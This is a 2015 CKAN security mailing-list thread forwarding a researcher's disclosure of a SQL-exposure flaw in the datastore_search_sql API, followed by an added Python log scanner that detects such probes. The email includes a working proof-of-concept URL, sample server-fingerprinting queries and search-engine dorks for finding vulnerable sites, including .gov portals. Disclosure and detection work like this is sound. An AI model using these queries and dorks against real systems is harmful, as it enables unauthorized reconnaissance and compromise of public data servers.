[CKAN-Security] Fwd: security vulnerability in CKAN

Matt Moore matt.moore at okfn.org
Mon Mar 2 08:18:43 UTC 2015


---------- Forwarded message ----------
From: dophine britanico <dophine at gmail.com>
Date: 2 March 2015 at 07:48
Subject: Re: security vulnerability in CKAN
To: Matt Moore <matt.moore at okfn.org>


Hi,

Thank you. I believe in responsible security disclosure, so I contacted you.
Here is what I found while auditing our CKAN server.

vulnerability: CKAN API

URL: http://demo.ckan.org/api/action/datastore_search_sql
SQL injection points: ?sql=INJECT HERE

To replicate:
Install JSON View plugin for firefox or chrome

POC:
http://demo.ckan.org/api/action/datastore_search_sql?sql=SELECT%20inet_server_addr%28%29;

Sample SQL:
SELECT current_database()
SELECT current_user;
SELECT inet_server_addr();
SELECT version()

The vulnerable URL will return sensitive information; a persistent attacker
will use and escalate this to a total server compromise.

Google dork:
inurl:datastore_search_sql

This can be also directly fingerprinted and replicated to any website using
CKAN.

Vulnerable as well is the US data portal www.data.gov, which I have also
contacted in case the response from you is delayed.

site:.gov datastore_search_sql

Suggested Fix:
Sanitize or remove the 'sql' input parameter from datastore_search_sql
Remove the api_info.html?resource_id sample query from the default install


Sincerely,
Michael Britanico


On Mon, Mar 2, 2015 at 3:27 PM, Matt Moore <matt.moore at okfn.org> wrote:

> Dophine,
>
> If you could provide us with some information, then we can look into the
> vulnerability.  I've mentioned this to our development team, but without
> some information, there's not much we can do.
>
> Thanks,
>
> Matthew Moore
>
> On 2 March 2015 at 06:13, dophine britanico <dophine at gmail.com> wrote:
>
>> Hello,
>>
>> I would like to inform you of a remote and serious vulnerability in the
>> default and recent version of CKAN and probably all recent versions of CKAN.
>>
>> Please contact me anytime.
>>
>> Dophine "Michael" Britanico
>> Security Researcher
>> (+63) 9151100672
>>
>>
>
>
> --
> Matthew Moore
> Sysadmin
> Open Knowledge - www.okfn.org
> Skype - notmatt
>




-- 
Matthew Moore
Sysadmin
Open Knowledge - www.okfn.org
Skype - notmatt
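A defender-side check for the pattern described in the report above, as an added example (not CKAN's or the reporter's code): it scans Common Log Format access-log lines for datastore_search_sql requests whose sql parameter calls the server-information functions listed in the report. The log lines are constructed samples.

```python
"""Flag datastore_search_sql requests whose ``sql`` parameter calls the
PostgreSQL server-information functions named in the report above."""
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/api/action/datastore_search_sql"

# version(), inet_server_addr() and current_database() take parentheses;
# current_user is a bare SQL keyword, so it is matched without them.
PROBE_RE = re.compile(
    r"\b(?:inet_server_addr|version|current_database)\s*\(|\bcurrent_user\b",
    re.IGNORECASE)

# Common Log Format: client ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

def sql_param(target):
    """Decoded ``sql`` parameter of a datastore_search_sql request target,
    or None when the target is some other endpoint."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    values = parse_qs(parts.query).get("sql")  # percent- and '+'-decodes
    return values[0] if values else None

def scan_access_log(lines):
    """Return (client, time, sql) for every request calling a probe function."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        sql = sql_param(m.group("target"))
        if sql is not None and PROBE_RE.search(sql):
            hits.append((m.group("client"), m.group("time"), sql))
    return hits

# Constructed sample lines (203.0.113.0/24 is documentation address space).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Mar/2015:07:48:12 +0000] "GET /api/action/datastore_search_sql?sql=SELECT%20inet_server_addr%28%29 HTTP/1.1" 200 312',
    '203.0.113.9 - - [02/Mar/2015:07:49:01 +0000] "GET /api/action/datastore_search_sql?sql=SELECT+*+FROM+%22resource_table%22+LIMIT+5 HTTP/1.1" 200 4120',
    '203.0.113.9 - - [02/Mar/2015:07:49:30 +0000] "GET /api/action/package_list HTTP/1.1" 200 980',
    '203.0.113.5 - - [02/Mar/2015:07:50:02 +0000] "GET /api/action/datastore_search_sql?sql=SELECT%20current_user%3B HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for client, when, sql in scan_access_log(SAMPLE_LOG):
        print(f"{when} {client} probed server metadata: {sql}")
```

Ordinary resource queries (the second sample line) pass untouched; only requests to this endpoint whose decoded sql calls one of the listed functions are reported.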